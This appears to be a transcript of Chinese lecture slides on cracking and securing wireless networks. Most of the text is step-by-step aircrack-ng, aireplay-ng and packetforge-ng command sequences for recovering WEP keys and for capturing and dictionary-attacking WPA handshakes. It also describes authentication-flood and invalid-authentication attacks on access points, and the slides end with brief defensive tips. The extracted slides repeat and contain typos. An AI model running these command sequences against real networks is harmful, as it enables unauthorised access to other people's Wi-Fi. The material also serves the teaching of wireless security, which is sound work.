无线的破解

Download Report

Transcript 无线的破解

无线的破解与安全
姜辉
提纲
相关背景
WEP的破解(1)
WPA的破解
无线安全
相关背景
无线网卡的选择



芯片。Athetos ,Prism,Ralink (USB)
无线网卡的硬件/固件版本
无线网卡的功率及规格
基本知识



SSID(Service Set Identifier,服务集标识符)
一个唯一的标识符,最大长度32
WAP(wireless Application Protocol,无线应用
协议)
AP((wireless Access Point)) 无线接入点
相关背景
几个比较好的无线破解系统(Linux)



BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具




Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者
相关背景
几个比较出名linux系统



BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具




Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
相关背景
几个比较出名linux系统



BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具




Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
WEP破解技术(1)
 Ifconfig –a wlan0 up


载入无线网卡的驱动程序
首先要在vmware中连接
 探测无线AP的信息
 airmon-ng start wlan0 监控频道

成功后会开启一个监控网卡,如 mon0
 airodump–ng –w dump –channel 6 mon0
 aireplay-ng -3 –b ap’s MAC –h client’s MAC –x
1024 mon0
 aircrack-ng –x –f 2 dump-01.cap
WEP破解技术(2)
 Ifconfig –a wlan0 up


载入无线网卡的驱动程序
首先要在vmware中连接
 探测无线AP的信息
 airmon-ng start wlan0 监控频道

成功后会开启一个监控网卡,如 mon0
 airodump –ng –ivs –c 监控频道–w dump –
channel 6 mon0
 aireplay-ng -1 0 –e ap’s essid ap’s MAC –h
client’s MAC (网卡) –x mon0
WEP破解技术(2)
 aireplay-ng -4 –b AP’s MAC –h client’s MAC
mon0



Chopchop 攻击
生产可用的密钥数据流文件
会生产一个cap和一个xor的文件
 packetforge-ng –o –a AP’MAC –h client’s MAC k 255.255.255.255 -1 255.255.255.255 –y
fragment xor file –w dump1
 airepaly-ng -2 –r dump1 mon0
 aircrack-ng dump*.ivs
WAP破解技术
 airmon-ng start wlan0

没有正常的加载驱动

Dump为数据包
 airodump-ng -w dump –channel 频道 mon0
 aireplay-ng -o 攻击次数 AP’s MAC –h client’s
MAC mon0

WPA握手的验证
 zcat /pentest/password/dictionaries/ wordlist.txt.Z
>password.txt

生产字典(bt4 自带)
 aircrack-ng –w password.txt -z dump01.cap

破解
WEP破解流程
无线的安全
身份验证洪泛攻击
攻击原理
关联的客户端向AP发送大量伪造身份验证请求
当请求超出AP的承载能力时断开与客户的连接
攻击实现
使用看似合法的但是随机生成MAC伪造工作站
向AP发送大量的虚假请求
身份验证失败攻击
攻击原理
关联的客户端向AP伪造客户端无效验证帧
AP将受害客户端更新为状态1
攻击实现
关联客户端伪造某合法客户端向AP发送无效的验证帧
AP认为该验证请求无效
将受害者的状态更新为1
总结
尽量使用相对安全的防御措施
隐藏无线局域网的SSID号码
使用WPA加密
实施MAC地址过滤
进行802.1x认证
控制无线信号的范围